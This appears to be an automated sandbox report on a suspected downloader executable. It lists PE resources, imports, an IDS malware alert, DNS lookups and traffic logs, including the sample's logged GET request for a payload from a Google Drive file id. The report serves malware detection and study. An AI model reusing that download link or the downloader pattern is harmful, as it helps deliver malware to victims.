RT_ICON | 0x5bfc0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6453900709219859
RT_ICON | 0x5c428 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.4274193548387097
RT_ICON | 0x5c710 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4651639344262295
RT_ICON | 0x5c8f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5067567567567568
RT_DIALOG | 0x5ca20 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x5cb20 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x5cc40 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x5cd08 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x5cd68 | 0xbc | data | English | United States | 0.601063829787234
RT_VERSION | 0x5ce28 | 0x1a4 | data | English | United States | 0.5642857142857143
RT_MANIFEST | 0x5cfd0 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T18:05:44.396851+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49751 | 172.217.19.174 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Dec 16, 2024 18:07:00.295130968 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:00.298475027 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:00.298492908 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.011967897 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.012053967 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.013076067 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.013191938 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.015063047 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.015069962 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.015419006 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.015573025 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.015856028 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.059339046 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.924706936 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.924846888 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.924859047 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.924922943 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.925046921 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.925084114 CET44349932172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:02.925158978 CET49932443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:02.951086044 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:02.951117039 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:02.951183081 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:02.951406002 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:02.951421976 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:04.650885105 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:04.650995970 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:04.651519060 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:04.651527882 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:04.651736975 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:04.651742935 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:05.580539942 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:05.580653906 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:05.580729961 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:05.580729961 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:05.580753088 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:05.580809116 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:05.591310024 CET49940443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:05.591335058 CET44349940142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:15.639709949 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:15.639753103 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:15.639892101 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:15.640342951 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:15.640361071 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:17.334503889 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:17.334768057 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:17.335246086 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:17.335308075 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:17.337438107 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:17.337462902 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:17.337696075 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:17.337747097 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:17.338179111 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:17.379333973 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:18.241579056 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:18.241683006 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:18.241713047 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:18.241805077 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:18.241864920 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:18.241911888 CET44349969172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:18.242027044 CET49969443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:18.265610933 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:18.265649080 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:18.265723944 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:18.266042948 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:18.266057968 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:19.978538036 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:19.978607893 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:20.003499031 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:20.003511906 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:20.003865957 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:20.003870964 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861392975 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861438036 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861454964 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.861481905 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861495018 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.861521006 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.861711979 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861764908 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.861773014 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.861824989 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.862544060 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.862572908 CET44349975142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:21.862581968 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:21.862636089 CET49975443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:31.889554024 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:31.889622927 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:31.889717102 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:31.890191078 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:31.890208006 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:33.653410912 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:33.653675079 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:33.654140949 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:33.654251099 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:33.655790091 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:33.655796051 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:33.656017065 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:33.656112909 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:33.656414986 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:33.703332901 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624119043 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624212980 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624224901 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624277115 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624309063 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624351025 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624351025 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624397039 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624418020 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624439001 CET44349986172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:34.624453068 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.624486923 CET49986443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:34.646197081 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:34.646253109 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:34.646336079 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:34.646569014 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:34.646581888 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:36.496123075 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:36.496218920 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:36.496802092 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:36.496829987 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:36.496984005 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:36.496997118 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.443511963 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.443623066 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.443701982 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.443761110 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.443859100 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.443859100 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.443881989 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.443938017 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.443981886 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:37.444046021 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.444593906 CET49987443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:37.444628954 CET44349987142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:47.477473974 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:47.477549076 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:47.477637053 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:47.478095055 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:47.478110075 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:49.181323051 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:49.181391954 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:49.196232080 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:49.196245909 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:49.196491003 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:49.196496964 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:50.103425026 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:50.106340885 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:50.106359005 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:50.106410980 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:50.106520891 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:50.106555939 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:50.106751919 CET44349988172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:07:50.106806040 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:50.106821060 CET49988443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:07:50.138454914 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:50.138495922 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:50.138580084 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:50.138902903 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:50.138916969 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:51.833661079 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:51.833745956 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:51.834307909 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:51.834319115 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:51.834507942 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:51.834515095 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:52.813725948 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:52.813801050 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:52.813823938 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:52.813864946 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:52.814048052 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:52.814091921 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:52.814672947 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:07:52.814701080 CET44349989142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:07:52.814759970 CET49989443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:02.843664885 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:02.843728065 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:02.843853951 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:02.844352007 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:02.844363928 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:04.583450079 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:04.583555937 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:04.584557056 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:04.584618092 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:04.602500916 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:04.602555990 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:04.603601933 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:04.603693962 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:04.617109060 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:04.663330078 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:05.501080036 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:05.501183033 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:05.501326084 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:05.501403093 CET44349990172.217.19.174192.168.2.7
                                                Dec 16, 2024 18:08:05.501523972 CET49990443192.168.2.7172.217.19.174
                                                Dec 16, 2024 18:08:05.521800041 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:05.521902084 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:05.522032976 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:05.522284985 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:05.522319078 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:07.314270020 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:07.314486980 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:07.318079948 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:07.318089962 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:07.318397045 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:07.318468094 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:07.318993092 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:07.363322973 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:08.275755882 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:08.275924921 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:08.275955915 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:08.276002884 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:08.276283979 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:08.276330948 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:08.276760101 CET49991443192.168.2.7142.250.181.1
                                                Dec 16, 2024 18:08:08.276792049 CET44349991142.250.181.1192.168.2.7
                                                Dec 16, 2024 18:08:08.276840925 CET49991443192.168.2.7142.250.181.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 18:05:41.634985924 CET | 63200 | 53 | 192.168.2.7 | 1.1.1.1
Dec 16, 2024 18:05:41.772861004 CET | 53 | 63200 | 1.1.1.1 | 192.168.2.7
Dec 16, 2024 18:05:44.439698935 CET | 62362 | 53 | 192.168.2.7 | 1.1.1.1
Dec 16, 2024 18:05:44.584628105 CET | 53 | 62362 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 18:05:41.634985924 CET | 192.168.2.7 | 1.1.1.1 | 0xf2df | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:05:44.439698935 CET | 192.168.2.7 | 1.1.1.1 | 0x67da | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 18:05:41.772861004 CET | 1.1.1.1 | 192.168.2.7 | 0xf2df | No error (0) | drive.google.com | - | 172.217.19.174 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 18:05:44.584628105 CET | 1.1.1.1 | 192.168.2.7 | 0x67da | No error (0) | drive.usercontent.google.com | - | 142.250.181.1 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49751 | 172.217.19.174 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 17:05:43 UTC | 216 | OUT | GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
2024-12-16 17:05:44 UTC | 1920 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Dec 2024 17:05:44 GMT
Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: script-src 'nonce-AKDdjYNe8LJsntZYyFplEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.7 | 49760 | 142.250.181.14 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:05:46 UTC | 258 | OUT | GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                2024-12-16 17:05:47 UTC | 2219 | IN | HTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC4AGVAA5_WWVNHbntxDjCPkIOu4s7cmQsXxk7QPYvsNqT9WD6FWjTvEmuyHDoAXwdCW
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:05:46 GMT
                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-unb7a40A_XHPKEdcYKqwdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
